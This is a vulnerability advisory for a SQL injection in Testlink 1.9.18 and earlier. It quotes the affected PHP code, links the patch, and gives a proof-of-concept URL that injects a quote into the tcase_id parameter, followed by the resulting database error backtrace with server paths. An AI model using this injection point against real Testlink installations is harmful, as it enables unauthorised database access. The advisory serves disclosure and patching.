Affected software: Testlink 1.9.18 and prior Credit: Maksymilian Arciemowicz (CXSECURITY) Affected code: ---------------- $tcase_id = isset($_REQUEST['tcase_id']) ? $_REQUEST['tcase_id']: null; $tcversion_id = isset($_REQUEST['tcversion_id']) ? $_REQUEST['tcversion_id']: 0; $info = ''; if( !is_null($tcase_id) ) { if($tcversion_id > 0 ) { $tcase = $tcase_mgr->get_by_id($tcase_id,$tcversion_id); ---------------- Patch: https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/2c85dc8f472f4eedba70a24456be5239dc3045a3 PoC http://localhost/lib/ajax/gettestcasesummary.php?tcase_id=1%27 Error message and SQL Syntax: ============================================================================== DB Access Error - debug_print_backtrace() OUTPUT START ATTENTION: Enabling more debug info will produce path disclosure weakness (CWE-200) Having this additional Information could be useful for reporting issue to development TEAM. ============================================================================== #0 database->exec_query(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' ) called at [/opt/bitnami/testlink/lib/functions/database.class.php:563] #1 database->fetchFirstRow(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' ) called at [/opt/bitnami/testlink/lib/functions/database.class.php:545] 0000002 database->fetchFirstRowSingleColumn(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' , version) called at [/opt/bitnami/testlink/lib/functions/testcase.class.php:1977] 0000003 testcase->get_last_version_info(1') called at [/opt/bitnami/testlink/lib/ajax/gettestcasesummary.php:35]